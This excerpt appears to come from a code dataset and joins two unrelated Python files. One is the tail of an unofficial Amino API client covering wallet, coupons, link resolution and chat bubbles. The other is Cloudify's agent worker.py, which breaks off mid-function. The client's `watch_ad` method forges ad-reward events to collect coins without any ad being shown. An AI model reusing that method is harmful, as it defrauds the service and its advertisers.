response = self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet History List <amino.lib.util.objects.WalletHistory>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from a Device ID.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- Example: for ``https://aminoapps.com/p/EXAMPLE``, the ``code`` is ``EXAMPLE``.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
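# Usage sketch (hypothetical code; assumes an authenticated instance `client`):
#     info = client.get_from_code("EXAMPLE")   # from https://aminoapps.com/p/EXAMPLE
# The returned object is whatever objects.FromCode exposes (typically the resolved
# object's ID and type); exact attribute names depend on that class.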
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectId** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = self.session.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get a list of Users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def accept_organizer(self, chatId: str, requestId: str):
return self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def wallet_config(self, level: int):
"""
Change the ads config.
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_avatar_frames(self, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
def upload_bubble_preview(self, file: BinaryIO) -> str:
"""
Upload bubble preview image to the amino servers. Authorization required.
**Parameters**
- **file** - PNG image to be uploaded.
**Returns**
- **Success** : Url of the bubble preview image uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload/target/chat-bubble-thumbnail", data=data, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def upload_bubble(self, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()["chatBubble"]["bubbleId"]
def change_bubble(self, bubbleId: str, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/{bubbleId}", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()
def create_custom_bubble(self, cover: BinaryIO, previewBackgroundUrl: BinaryIO, name: str, textColor: str = "#ffffff", linkColor: str = "#039eff", contentInsets: list = None, bubbleType: int = 1, zoomPoint: list = None, allowedSlots: list = None):
if not contentInsets: contentInsets = [26, 33, 18, 49]
if not zoomPoint: zoomPoint = [41, 44]
if not allowedSlots: allowedSlots = [{"y": -5, "x": 5, "align": 1}, {"y": 5, "x": -30, "align": 4}, {"y": 5, "x": 5, "align": 3}]
icon = self.upload_bubble_preview(previewBackgroundUrl)
cover = self.upload_bubble_preview(cover)
path = icon[len(icon) - 3:len(icon)]
config = json.dumps({
"status": 0,
"allowedSlots": allowedSlots,
"name": f"{name} (Costume) #0000000001",
"vertexInset": 0,
"contentInsets": contentInsets,
"coverImage": cover,
"bubbleType": bubbleType,
"zoomPoint": zoomPoint,
"version": 1,
"linkColor": linkColor,
"slots": None,
"previewBackgroundUrl": icon,
"id": "52a91df5-38e1-4433-b8d6-253630f1d2e8",
"color": textColor,
"backgroundPath": f"background.{path}"
})
with open("config.json", "w") as file:
file.write(config)
with open(f"background.png", "wb") as file:
file.write(self.session.get(icon).content)
zip = ZipFile("ChatBubble/bubble.zip", "w")
zip.write("config.json")
zip.write(f"background.png")
zip.close()
bubble = self.upload_bubble(open("ChatBubble/default.zip", "rb").read())
response = self.change_bubble(bubble, config=open("ChatBubble/bubble.zip", "rb").read())
if response.status_code != 200: return exceptions.CheckException(response)
else: return response.status_code
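# Flow summary for create_custom_bubble (a sketch, based on the code above):
#   1. upload the preview background and cover images to get their media URLs,
#   2. write config.json plus the downloaded background image and zip them into
#      ChatBubble/bubble.zip,
#   3. generate a new bubble from the stock ChatBubble/default.zip template, then
#      apply the custom zip to it via change_bubble.
# The ChatBubble/ directory and the default.zip template are assumed to exist locally.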
def watch_ad(self, uid: str = None):
data = headers.AdHeaders(uid if uid else self.userId).data
response = self.session.post("https://ads.tapdaq.com/v4/analytics/reward", json=data, headers=headers.AdHeaders().headers, proxies=self.proxies)
if response.status_code != 204: return exceptions.CheckException(response.status_code)
else: return response.status_code
|
worker.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import sys
import time
import logging
import argparse
import traceback
import tempfile
import json
import subprocess
import shutil
import threading
from contextlib import contextmanager
from cloudify import plugin_installer
from cloudify_agent.api import utils
from cloudify_agent.api.factory import DaemonFactory
from cloudify_rest_client.exceptions import (
UserUnauthorizedError,
CloudifyClientError
)
from cloudify import constants, exceptions, state
from cloudify.context import CloudifyContext
from cloudify.models_states import ExecutionState
from cloudify.logs import setup_agent_logger
from cloudify.state import current_ctx
from cloudify.error_handling import (
serialize_known_exception,
deserialize_known_exception
)
from cloudify.amqp_client import (
AMQPConnection, TaskConsumer, NO_RESPONSE, STOP_AGENT
)
from cloudify.utils import get_manager_name, get_python_path
from cloudify_agent.operations import install_plugins, uninstall_plugins
from cloudify._compat import PY2, parse_version
SYSTEM_DEPLOYMENT = '__system__'
ENV_ENCODING = 'utf-8' # encoding for env variables
DEFAULT_MAX_WORKERS = 10
CLOUDIFY_DISPATCH = 'CLOUDIFY_DISPATCH'
PREINSTALLED_PLUGINS = [
'agent',
'diamond', # Stub for back compat
'script',
'cfy_extensions',
'default_workflows',
'worker_installer',
'cloudify_system_workflows',
'agent_installer',
]
class LockedFile(object):
"""Like a writable file object, but writes are under a lock.
Used for logging, so that multiple threads can write to the same logfile
safely (deployment.log).
We keep track of the number of users, so that we can close the file
only when the last one stops writing.
"""
SETUP_LOGGER_LOCK = threading.Lock()
LOGFILES = {}
@classmethod
def open(cls, fn):
"""Create a new LockedFile, or get a cached one if one for this
filename already exists.
"""
with cls.SETUP_LOGGER_LOCK:
if fn not in cls.LOGFILES:
if not os.path.exists(os.path.dirname(fn)):
os.mkdir(os.path.dirname(fn))
cls.LOGFILES[fn] = cls(fn)
rv = cls.LOGFILES[fn]
rv.users += 1
return rv
def __init__(self, filename):
self._filename = filename
self._f = None
self.users = 0
self._lock = threading.Lock()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def write(self, data):
with self._lock:
if self._f is None:
self._f = open(self._filename, 'ab')
self._f.write(data)
self._f.flush()
def close(self):
with self.SETUP_LOGGER_LOCK:
self.users -= 1
if self.users == 0:
if self._f:
self._f.close()
self.LOGFILES.pop(self._filename)
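# Usage sketch (illustrative; mirrors how the consumers below use it; the path is hypothetical):
#     logfile = LockedFile.open('/path/to/deployment.log')
#     with logfile as f:
#         f.write(b'line from one of several worker threads\n')
# The same LockedFile instance is shared per filename, and the underlying file is only
# closed once the last user has exited the context manager.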
class TimeoutWrapper(object):
def __init__(self, ctx, process):
self.timeout = ctx.timeout
self.timeout_recoverable = ctx.timeout_recoverable
self.timeout_encountered = False
self.process = process
self.timer = None
self.logger = logging.getLogger(__name__)
def _timer_func(self):
self.timeout_encountered = True
self.logger.warning("Terminating subprocess; PID=%d...",
self.process.pid)
self.process.terminate()
for i in range(10):
if self.process.poll() is not None:
return
self.logger.warning("Subprocess still alive; waiting...")
time.sleep(0.5)
self.logger.warning("Subprocess still alive; sending KILL signal")
self.process.kill()
self.logger.warning("Subprocess killed")
def __enter__(self):
if self.timeout:
self.timer = threading.Timer(self.timeout, self._timer_func)
self.timer.start()
return self
def __exit__(self, *args):
if self.timer:
self.timer.cancel()
class CloudifyOperationConsumer(TaskConsumer):
routing_key = 'operation'
def __init__(self, *args, **kwargs):
self._process_registry = kwargs.pop('registry', None)
self._plugin_version_cache = {}
super(CloudifyOperationConsumer, self).__init__(*args, **kwargs)
def _print_task(self, ctx, action, status=None):
if ctx.task_type in ['workflow', 'hook']:
prefix = '{0} {1}'.format(action, ctx.task_type)
suffix = ''
elif ctx.type == constants.NODE_INSTANCE:
prefix = '{0} operation'.format(action)
suffix = '\n\tNode ID: {0}'.format(ctx.node.id)
else:
prefix = ''
suffix = ''
if status:
suffix += '\n\tStatus: {0}'.format(status)
logger.info(
'\n\t%(prefix)s on queue `%(queue)s` on tenant `%(tenant)s`:\n'
'\tTask name: %(name)s\n'
'\tExecution ID: %(execution_id)s\n'
'\tWorkflow ID: %(workflow_id)s%(suffix)s\n',
{'tenant': ctx.tenant_name,
'prefix': prefix,
'name': ctx.task_name,
'queue': ctx.task_target,
'execution_id': ctx.execution_id,
'workflow_id': ctx.workflow_id,
'suffix': suffix})
@staticmethod
def _validate_not_cancelled(ctx):
"""
Validate that the currently running task has not been cancelled.
:param ctx: the operation context of the task being handled
"""
# We also need to handle old tasks that are still in the queue and were
# not yet picked up by the worker, so that we can ignore them when the
# execution state is cancelled, and likewise ignore pending tasks that
# were picked up but not yet executed. Moreover, we need to handle the
# case where a resume workflow is running while old operation tasks are
# still in the queue holding an invalid execution token, which could
# raise a 401 error.
# Use the context associated with that task.
with state.current_ctx.push(ctx):
try:
# Get the status of the current execution so that we can
# tell if the current running task can be run or not
current_execution = ctx.get_execution()
if current_execution:
logger.info(
'The current status of the execution is {0}'
''.format(current_execution.status)
)
# If the current execution is cancelled, this task was already in
# the queue when the cancel was triggered, so we must not run tasks
# that belong to that cancelled execution
if current_execution.status == ExecutionState.CANCELLED:
raise exceptions.ProcessKillCancelled()
else:
raise exceptions.NonRecoverableError(
'No execution available'
)
except UserUnauthorizedError:
# This means that Execution token is no longer valid since
# there is a new token re-generated because of resume workflow
raise exceptions.ProcessKillCancelled()
@contextmanager
def _update_operation_state(self, ctx, common_version):
if common_version < parse_version('6.2.0'):
# plugin's common is old - it does the operation state bookkeeping
# by itself.
yield
return
store = True
try:
op = ctx.get_operation()
except CloudifyClientError as e:
if e.status_code == 404:
op = None
store = False
else:
raise
if op and op.state == constants.TASK_STARTED:
# this operation has been started before? that means we're
# resuming a re-delivered operation
ctx.resume = True
if store:
ctx.update_operation(constants.TASK_STARTED)
try:
yield
finally:
if store:
ctx.update_operation(constants.TASK_RESPONSE_SENT)
def _plugin_common_version(self, executable, env):
"""The cloudify-common version included in the venv at executable.
Old cloudify-common versions have a slightly different interface,
so we need to figure out what version each plugin uses.
"""
if executable not in self._plugin_version_cache:
get_version_script = (
'import pkg_resources; '
'print(pkg_resources.require("cloudify-common")[0].version)'
)
try:
version_output = subprocess.check_output(
[executable, '-c', get_version_script], env=env
).decode('utf-8')
version = parse_version(version_output)
# also strip any possible .dev1 etc suffixes
version = parse_version(version.base_version)
except subprocess.CalledProcessError:
# we couldn't get it? it's most likely very old
version = parse_version('0.0.0')
self._plugin_version_cache[executable] = version
return self._plugin_version_cache[executable]
def handle_task(self, full_task):
task = full_task['cloudify_task']
raw_ctx = task['kwargs'].pop('__cloudify_context')
ctx = CloudifyContext(raw_ctx)
task_args = task.get('args', [])
task_kwargs = task['kwargs']
self._print_task(ctx, 'Started handling')
try:
self._validate_not_cancelled(ctx)
rv = self.dispatch_to_subprocess(ctx, task_args, task_kwargs)
result = {'ok': True, 'result': rv}
status = 'SUCCESS - result: {0}'.format(result)
except exceptions.StopAgent:
result = STOP_AGENT
status = 'Stopping agent'
except exceptions.OperationRetry as e:
result = {'ok': False, 'error': serialize_known_exception(e)}
status = 'Operation rescheduled'
except exceptions.ProcessKillCancelled:
self._print_task(ctx, 'Task kill-cancelled')
return NO_RESPONSE
except Exception as e:
error = serialize_known_exception(e)
result = {'ok': False, 'error': error}
status = 'ERROR - result: {0}'.format(result)
logger.error(
'ERROR - caught: %r%s',
e,
'\n{0}'.format(error['traceback'])
if error.get('traceback') else ''
)
self._print_task(ctx, 'Finished handling', status)
return result
def dispatch_to_subprocess(self, ctx, task_args, task_kwargs):
# input.json and output.json are written to a temporary directory
# that only lives for the lifetime of the subprocess
dispatch_dir = None
try:
if ctx.bypass_maintenance:
os.environ[constants.BYPASS_MAINTENANCE] = 'True'
env = self._build_subprocess_env(ctx)
if self._uses_external_plugin(ctx):
plugin_dir = self._extract_plugin_dir(ctx)
if plugin_dir is None:
self._install_plugin(ctx)
plugin_dir = self._extract_plugin_dir(ctx)
if plugin_dir is None:
raise RuntimeError(
'Plugin was not installed: {0}'
.format(ctx.plugin.name))
executable = get_python_path(plugin_dir)
else:
executable = sys.executable
env['PATH'] = os.pathsep.join([
os.path.dirname(executable), env['PATH']
])
split = ctx.task_name.split('.')
dispatch_dir = tempfile.mkdtemp(prefix='task-{0}.{1}-'.format(
split[0], split[-1]))
command_args = [executable, '-u', '-m', 'cloudify.dispatch',
dispatch_dir]
common_version = self._plugin_common_version(executable, env)
with self._update_operation_state(ctx, common_version):
with open(os.path.join(dispatch_dir, 'input.json'), 'w') as f:
json.dump({
'cloudify_context': ctx._context,
'args': task_args,
'kwargs': task_kwargs
}, f)
self.run_subprocess(ctx, command_args,
env=env,
bufsize=1,
close_fds=os.name != 'nt')
with open(os.path.join(dispatch_dir, 'output.json')) as f:
dispatch_output = json.load(f)
return self._handle_subprocess_output(dispatch_output)
finally:
if dispatch_dir:
shutil.rmtree(dispatch_dir, ignore_errors=True)
def _handle_subprocess_output(self, dispatch_output):
if dispatch_output['type'] == 'result':
return dispatch_output['payload']
elif dispatch_output['type'] == 'error':
e = dispatch_output['payload']
error = deserialize_known_exception(e)
error.causes.append({
'message': e['message'],
'type': e['exception_type'],
'traceback': e.get('traceback')
})
raise error
else:
raise exceptions.NonRecoverableError(
'Unexpected output type: {0}'
.format(dispatch_output['type']))
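# For reference, a sketch of the files exchanged with the dispatched subprocess
# (shapes inferred from dispatch_to_subprocess above; exact payloads depend on
# cloudify.dispatch):
#   input.json  -> {"cloudify_context": {...}, "args": [...], "kwargs": {...}}
#   output.json -> {"type": "result", "payload": <return value>}
#                  or {"type": "error", "payload": <serialized exception>}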
def _build_subprocess_env(self, ctx):
env = os.environ.copy()
# marker for code that only gets executed when inside the dispatched
# subprocess, see usage in the imports section of this module
env[CLOUDIFY_DISPATCH] = 'true'
# This is used to support environment variables configurations for
# central deployment based operations. See workflow_context to
# understand where this value gets set initially
# Note that this is received via json, so it is unicode. It must
# be encoded, because environment variables must be bytes.
execution_env = ctx.execution_env
if PY2:
execution_env = dict((k.encode(ENV_ENCODING),
v.encode(ENV_ENCODING))
for k, v in execution_env.items())
env.update(execution_env)
if ctx.bypass_maintenance:
env[constants.BYPASS_MAINTENANCE] = 'True'
return env
def _uses_external_plugin(self, ctx):
"""Whether this operation uses a plugin that is not built-in"""
if not ctx.plugin.name:
return False
if ctx.plugin.name in PREINSTALLED_PLUGINS:
return False
return True
def _extract_plugin_dir(self, ctx):
return ctx.plugin.prefix
def _install_plugin(self, ctx):
with state.current_ctx.push(ctx):
# source plugins are per-deployment/blueprint, while non-source
# plugins are expected to be "managed", ie. uploaded to the manager
if ctx.plugin.source:
dep_id = ctx.deployment.id
bp_id = ctx.blueprint.id
else:
dep_id = None
bp_id = None
plugin_installer.install(
ctx.plugin._plugin_context,
deployment_id=dep_id,
blueprint_id=bp_id)
def run_subprocess(self, ctx, *subprocess_args, **subprocess_kwargs):
subprocess_kwargs.setdefault('stderr', subprocess.STDOUT)
subprocess_kwargs.setdefault('stdout', subprocess.PIPE)
p = subprocess.Popen(*subprocess_args, **subprocess_kwargs)
if self._process_registry:
self._process_registry.register(ctx.execution_id, p)
with TimeoutWrapper(ctx, p) as timeout_wrapper:
with self.logfile(ctx) as f:
while True:
line = p.stdout.readline()
if line:
f.write(line)
if p.poll() is not None:
break
cancelled = False
if self._process_registry:
cancelled = self._process_registry.is_cancelled(ctx.execution_id)
self._process_registry.unregister(ctx.execution_id, p)
if timeout_wrapper.timeout_encountered:
message = 'Process killed due to timeout of %d seconds' % \
timeout_wrapper.timeout
if p.poll() is None:
message += ', however it has not stopped yet; please check ' \
'process ID {0} manually'.format(p.pid)
exception_class = exceptions.RecoverableError if \
timeout_wrapper.timeout_recoverable else \
exceptions.NonRecoverableError
raise exception_class(message)
if p.returncode in (-15, -9): # SIGTERM, SIGKILL
if cancelled:
raise exceptions.ProcessKillCancelled()
raise exceptions.NonRecoverableError('Process terminated (rc={0})'
.format(p.returncode))
if p.returncode != 0:
raise exceptions.NonRecoverableError(
'Unhandled exception occurred in operation dispatch (rc={0})'
.format(p.returncode))
def logfile(self, ctx):
try:
handler_context = ctx.deployment.id
except AttributeError:
handler_context = SYSTEM_DEPLOYMENT
else:
# an operation may originate from a system wide workflow.
# in that case, the deployment id will be None
handler_context = handler_context or SYSTEM_DEPLOYMENT
log_name = os.path.join(os.environ.get('AGENT_LOG_DIR', ''), 'logs',
'{0}.log'.format(handler_context))
return LockedFile.open(log_name)
class ServiceTaskConsumer(TaskConsumer):
routing_key = 'service'
service_tasks = {
'ping': 'ping_task',
'cluster-update': 'cluster_update_task',
'cancel-operation': 'cancel_operation_task',
'replace-ca-certs': 'replace_ca_certs_task',
'install-plugin': 'install_plugin_task',
'uninstall-plugin': 'uninstall_plugin_task',
}
def __init__(self, name, *args, **kwargs):
self.name = name
self._operation_registry = kwargs.pop('operation_registry')
super(ServiceTaskConsumer, self).__init__(*args, **kwargs)
def handle_task(self, full_task):
task = full_task['service_task']
task_name = task['task_name']
kwargs = task['kwargs']
logger.info(
'Received `{0}` service task with kwargs: {1}'.format(
task_name, kwargs))
task_handler = getattr(self, self.service_tasks[task_name])
result = task_handler(**kwargs)
logger.info('Result: {0}'.format(result))
return result
def ping_task(self):
return {'time': time.time()}
def install_plugin_task(self, plugin, rest_token, tenant,
rest_host, target=None, bypass_maintenance=False):
if target:
# target was provided, so this is to be installed only on the
# specified workers, but might have been received by us because
# it was sent to a fanout exchange.
# This only matters for mgmtworkers, because agents have no
# fanout exchanges.
if get_manager_name() not in target:
return
class _EmptyID(object):
id = None
class PluginInstallCloudifyContext(object):
"""A CloudifyContext that has just enough data to install plugins
"""
def __init__(self):
self.rest_host = rest_host
self.tenant_name = tenant['name']
self.rest_token = rest_token
self.execution_token = None
self.logger = logging.getLogger('plugin')
# deployment/blueprint are not defined for force-installs,
# but the ctx demands they be objects with an .id
self.deployment = _EmptyID()
self.blueprint = _EmptyID()
self.bypass_maintenance = bypass_maintenance
with current_ctx.push(PluginInstallCloudifyContext()):
install_plugins([plugin])
def uninstall_plugin_task(self, plugin, rest_token, tenant,
rest_host, target=None,
bypass_maintenance=False):
if target:
# target was provided, so this is to be installed only on the
# specified workers, but might have been received by us because
# it was sent to a fanout exchange.
# This only matters for mgmtworkers, because agents have no
# fanout exchanges.
if get_manager_name() not in target:
return
class _EmptyID(object):
id = None
class PluginUninstallCloudifyContext(object):
"""A CloudifyContext that has just enough data to uninstall plugins
"""
def __init__(self):
self.rest_host = rest_host
self.tenant_name = tenant['name']
self.rest_token = rest_token
self.execution_token = None
self.logger = logging.getLogger('plugin')
# deployment/blueprint are not defined for force-installs,
# but the ctx demands they be objects with an .id
self.deployment = _EmptyID()
self.blueprint = _EmptyID()
self.bypass_maintenance = bypass_maintenance
with current_ctx.push(PluginUninstallCloudifyContext()):
uninstall_plugins([plugin])
def cluster_update_task(self, brokers, broker_ca, managers, manager_ca):
"""Update the running agent with the new cluster.
When a node is added or removed from the cluster, the agent will
receive the current cluster nodes in this task. We need to update
the current process envvars, the cert files, and all the
daemon config files.
"""
self._assert_name('cluster-update')
factory = DaemonFactory()
daemon = factory.load(self.name)
rest_host_value = u','.join(managers)
if PY2:  # env vars must be bytes on Python 2, but str on Python 3
rest_host_value = rest_host_value.encode(ENV_ENCODING)
os.environ[constants.REST_HOST_KEY] = rest_host_value
with open(daemon.local_rest_cert_file, 'w') as f:
f.write(manager_ca)
with open(daemon.broker_ssl_cert_path, 'w') as f:
f.write(broker_ca)
daemon.rest_host = managers
daemon.broker_ip = brokers
daemon.create_broker_conf()
daemon.create_config()
factory.save(daemon)
def cancel_operation_task(self, execution_id):
logger.info('Cancelling task %s', execution_id)
self._operation_registry.cancel(execution_id)
def replace_ca_certs_task(self, new_manager_ca, new_broker_ca):
"""Update the running agent with new CAs."""
self._assert_name('replace-ca-certs')
factory = DaemonFactory()
daemon = factory.load(self.name)
if new_broker_ca:
with open(daemon.broker_ssl_cert_path, 'w') as f:
f.write(new_broker_ca)
daemon.create_broker_conf()
if new_manager_ca:
with open(daemon.local_rest_cert_file, 'w') as f:
f.write(new_manager_ca)
daemon.create_config()
factory.save(daemon)
def _assert_name(self, command_name):
if not self.name:
raise RuntimeError('{0} sent to agent with no name '
'set'.format(command_name))
def _setup_excepthook(daemon_name):
# Setting a new exception hook to catch any exceptions
# on agent startup and write them to a file. This file
# is later read for querying if celery has started successfully.
current_excepthook = sys.excepthook
def new_excepthook(exception_type, value, the_traceback):
# use the storage directory because the work directory might have
# been created under a different user, in which case we don't have
# permissions to write to it.
storage = utils.internal.get_daemon_storage_dir()
if not os.path.exists(storage):
os.makedirs(storage)
error_dump_path = os.path.join(
utils.internal.get_daemon_storage_dir(),
'{0}.err'.format(daemon_name))
with open(error_dump_path, 'w') as f:
f.write('Type: {0}\n'.format(exception_type))
f.write('Value: {0}\n'.format(value))
traceback.print_tb(the_traceback, file=f)
current_excepthook(exception_type, value, the_traceback)
sys.excepthook = new_excepthook
class ProcessRegistry(object):
"""A registry for dispatch subprocesses.
The dispatch TaskHandler uses this to register the subprocesses that
are running and executing a task, so that they can be cancelled/killed
from outside.
"""
def __init__(self):
self._processes = {}
self._cancelled = set()
def register(self, execution_id, process):
self._processes.setdefault(execution_id, []).append(process)
def unregister(self, execution_id, process):
try:
self._processes[execution_id].remove(process)
except (KeyError, ValueError):
pass
if not self._processes.get(execution_id) and \
execution_id in self._cancelled:
self._cancelled.remove(execution_id)
def cancel(self, execution_id):
self._cancelled.add(execution_id)
threads = [
threading.Thread(target=self._stop_process, args=(p,))
for p in self._processes.get(execution_id, [])
]
for thread in threads:
thread.start()
def _stop_process(self, process):
"""Stop the process: SIGTERM, and after 5 seconds, SIGKILL
Note that on windows, both terminate and kill are effectively
the same operation."""
process.terminate()
for i in range(10):
if process.poll() is not None:
return
time.sleep(0.5)
process.kill()
def is_cancelled(self, execution_id):
return execution_id in self._cancelled
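# Usage sketch (illustrative; this mirrors how the consumers above use the registry):
#     registry = ProcessRegistry()
#     registry.register(execution_id, popen_process)   # done in run_subprocess
#     registry.cancel(execution_id)                     # SIGTERM, then SIGKILL after ~5s
#     registry.is_cancelled(execution_id)               # checked after the process exits
#     registry.unregister(execution_id, popen_process)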
def make_amqp_worker(args):
operation_registry = ProcessRegistry()
handlers = [
CloudifyOperationConsumer(args.queue, args.max_workers,
registry=operation_registry),
